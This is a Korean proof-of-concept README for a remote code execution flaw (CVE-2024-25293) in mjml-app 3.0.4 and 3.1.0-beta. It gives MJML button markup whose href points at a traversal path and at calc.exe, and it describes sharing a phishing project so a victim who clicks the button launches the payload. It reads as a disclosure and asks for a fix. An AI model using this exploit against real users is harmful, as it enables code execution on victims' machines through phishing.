
mjml-app v3.0.4 & 3.1.0-beta RCE 익스플로잇
CVE-2024-25293 취약점에 대한 개념 증명(PoC)입니다.
mjml-app v3.0.4 및 3.1.0-beta에서 원격 코드 실행(RCE)이 발견되었습니다.
이 저장소에는 취약한 애플리케이션 예제와 이에 대한 개념 증명(PoC) 익스플로잇이 포함되어 있습니다.

1단계) 공격자는 'href' 태그가 있는 'mj-button'을 생성하고
<mjml>
<mj-body>
<mj-section>
<mj-column>
<mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
<mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
</mj-column>
</mj-section>
</mj-body>
</mjml>

2단계) 공격자는 다음 코드로 주요 피싱 프로젝트를 생성합니다.
<!-- header.mjml -->
<mj-section>
<mj-column>
<mj-text>This is a demo jruru</mj-text>
</mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

3단계) 피해자가 공유된 프로젝트를 열고 버튼을 클릭하면 페이로드(예: calc, notepad)가 실행됩니다.

애플리케이션 내에서 href 태그를 통해 exe 파일을 실행하는 것은 위험하며, 경로 탐색과 결합하여 파일을 실행하는 것은 보안 문제입니다. 이로 인해 피싱 프로젝트를 생성 및 배포하여 로컬 파일을 실행할 수 있습니다. 따라서 이러한 실행을 방지하기 위해 이 기능을 수정하는 것이 필수적입니다.